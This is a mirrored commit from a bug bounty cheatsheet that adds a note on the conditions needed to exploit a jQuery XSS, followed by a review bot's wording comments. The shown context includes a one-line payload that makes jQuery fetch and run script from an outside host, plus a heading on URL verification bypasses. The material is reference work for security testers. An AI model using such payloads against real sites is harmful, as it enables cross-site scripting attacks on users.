mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2025-02-16 14:38:22 +00:00
Add jQuery XSS notice.
parent
d8931cea8b
commit
ba67fdae97
1 changed files with 5 additions and 0 deletions
|
@ -40,6 +40,11 @@ Note: This kind of depends on what security level the application is set to. See
|
|||
$.get('http://sakurity.com/jqueryxss')
|
||||
```
|
||||
|
||||
In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
|
||||
|
||||
1) Find any cross domain requests to untrusted domains which may inadvertently execute script.
|
||||
2) Find any requests to trusted API endpoints where script can be injected into data sources.
|
||||
|
||||
**URL verification bypasses (works without `	` too)**
|
||||
|
||||
```
|
||||
|
|
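Review bot: The added paragraph after the `$.get('http://sakurity.com/jqueryxss')` example refers to "this jQuery XSS" without saying what behaviour it means or which jQuery versions it applies to, so a reader cannot tell from the notice alone whether a given application is affected; add one sentence describing the behaviour and the affected versions, or link a reference. In requirement 1, "cross domain" should be hyphenated as "cross-domain". Requirement 2 ("script can be injected into data sources") is vague about where the injected data has to end up; say explicitly that it must be returned in the response the page requests. It is also worth checking that the `1)` / `2)` markers match the list style used in the rest of the file.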